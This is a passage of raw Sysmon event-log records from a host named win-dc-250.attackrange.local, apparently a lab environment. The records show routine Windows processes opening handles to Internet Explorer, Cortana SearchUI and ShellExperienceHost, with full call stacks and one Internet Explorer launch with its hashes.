d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013051Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.326{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013050Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.326{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013049Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.326{08A6967A-4780-6000-3905-000000009A01}68686872C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\iertutil.dll+26f1c|C:\Windows\SYSTEM32\iertutil.dll+27ff3|C:\Windows\SYSTEM32\iertutil.dll+368c1|C:\Windows\SYSTEM32\iertutil.dll+34b5c|C:\Windows\SYSTEM32\iertutil.dll+34f0f|C:\Windows\SYSTEM32\iertutil.dll+480c8|C:\Windows\SYSTEM32\IEFRAME.dll+2bb1c2|C:\Windows\SYSTEM32\IEFRAME.dll+c63f5|C:\Windows\SYSTEM32\IEFRAME.dll+f7ba8|C:\Windows\SYSTEM32\IEFRAME.dll+f7ab0|C:\Windows\SYSTEM32\IEFRAME.dll+2e821|C:\Windows\SYSTEM32\IEFRAME.dll+2a83a6|C:\Windows\SYSTEM32\IEFRAME.dll+152634|C:\Windows\SYSTEM32\IEFRAME.dll+ccc61|C:\Windows\SYSTEM32\IEFRAME.dll+1526bf|C:\Program Files\Internet Explorer\iexplore.exe+14e9|C:\Program Files\Internet Explorer\iexplore.exe+1d77|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013048Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.318{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\iexplore.exe11.00.14393.2007 (rs1_release.171231-1800)Internet ExplorerInternet ExplorerMicrosoft CorporationIEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6868 CREDAT:82945 /prefetch:2C:\Users\Administrator\Desktop\ATTACKRANGE\Administrator{08A6967A-4752-6000-9133-2D0000000000}0x2d33912HighMD5=7D930D55986DF5C69CF1A9C2DE7E33B3,SHA256=BEBB0D2229700C6A62B7811985061DC75F6279AB0FF8747C47CCADB6CC2CC462,IMPHASH=E7542C041AAD637F8E6918BBE235A488{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" 10341000x800000000000000013047Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.310{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013046Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.295{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013045Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.107{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013044Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.107{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013043Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.092{08A6967A-4780-6000-3905-000000009A01}68686872C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\IEFRAME.dll+cd905|C:\Windows\SYSTEM32\IEFRAME.dll+cd883|C:\Windows\SYSTEM32\IEFRAME.dll+cd7fd|C:\Windows\SYSTEM32\IEFRAME.dll+cd60e|C:\Windows\SYSTEM32\IEFRAME.dll+2a80d0|C:\Windows\SYSTEM32\IEFRAME.dll+152634|C:\Windows\SYSTEM32\IEFRAME.dll+ccc61|C:\Windows\SYSTEM32\IEFRAME.dll+1526bf|C:\Program Files\Internet Explorer\iexplore.exe+14e9|C:\Program Files\Internet Explorer\iexplore.exe+1d77|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013042Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.092{08A6967A-4288-6000-1000-000000009A01}11362824C:\Windows\system32\svchost.exe{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013041Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.092{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013078Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:42.951{08A6967A-4288-6000-1000-000000009A01}11362824C:\Windows\system32\svchost.exe{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013077Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:42.951{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013076Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.998{08A6967A-4754-6000-1705-000000009A01}34083028C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013075Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.998{08A6967A-4753-6000-1105-000000009A01}45042676C:\Windows\system32\taskhostw.exe{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013094Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:44.935{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013093Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:44.935{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013092Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:44.935{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013091Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:44.935{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013090Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:44.935{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013089Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:44.935{08A6967A-4753-6000-0E05-000000009A01}23363552C:\Windows\system32\sihost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+1a0fc|C:\Windows\System32\modernexecserver.dll+1a09f|C:\Windows\System32\modernexecserver.dll+198f6|C:\Windows\System32\modernexecserver.dll+2c9d4|C:\Windows\System32\modernexecserver.dll+35efd|C:\Windows\System32\modernexecserver.dll+4d3a1|C:\Windows\System32\modernexecserver.dll+4d2bf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013088Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:44.904{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013087Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:44.904{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013086Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:44.904{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM